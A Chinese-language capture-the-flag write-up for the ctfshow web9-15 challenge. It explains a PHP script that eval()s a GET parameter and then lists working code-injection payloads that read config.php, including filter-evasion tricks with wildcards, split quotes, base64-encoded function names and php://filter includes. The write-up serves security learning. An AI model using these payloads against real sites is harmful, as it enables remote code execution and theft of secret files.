题目介绍:
ctfshow-萌新计划-web9-15
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(preg_match("/system|exec|highlight/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
题目分析:
包含配置文件:
include("config.php");
- 这行代码包含了一个名为
config.php
的文件,该文件可能包含一些配置信息,比如flag。
检查GET参数
c
是否存在:if(isset($_GET['c'])){ ... }
- 这段代码检查是否有通过GET方法提交的
c
参数。
获取
c
参数的值:$c = $_GET['c'];
- 将GET参数
c
的值赋给变量$c
。
正则表达式匹配:
if(preg_match("/system|exec|highlight/i",$c)){ ... }
- 使用
preg_match
函数检查变量$c
是否包含system
、exec
或highlight
这些字符串(不区分大小写)。这个正则表达式检查的目的是尝试防止某些特定的命令执行函数被调用。
执行代码:
eval($c);
- 如果正则表达式匹配成功,
eval
函数将执行变量$c
中包含的PHP代码。这是一个非常危险的操作,因为它允许执行任意PHP代码,可能导致严重的安全问题。
错误处理:
die("cmd error");
- 如果正则表达式没有匹配,脚本将终止执行并输出错误信息。
高亮显示当前文件:
highlight_file(__FILE__);
- 如果没有提交
c
参数,脚本将使用highlight_file
函数显示当前脚本文件的源代码。
payload:
?c=system('cat config.php');
?c=system('tac config.php');
?c=show_source('config.php');
?c=passthru('tac config.php');
?c=passthru('more config.php');
?c=passthru('more confi***hp');
?c=passthru('tac con\fig*')?>
?c=passthru('c""at con""fig?ph""p')?>
?c=passthru("ca''t `ls`")?>
?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);
?c=$a=opendir('/var/www/html');$e=readdir($a);$e=readdir($a);$e=readdir($a);echo%20readfile($e);
?c= include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php
?c=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php
?a=cat config.php&c=echo`$_REQUEST[a]`;
……
我不会接受我不要的未来,哪怕是命中注定。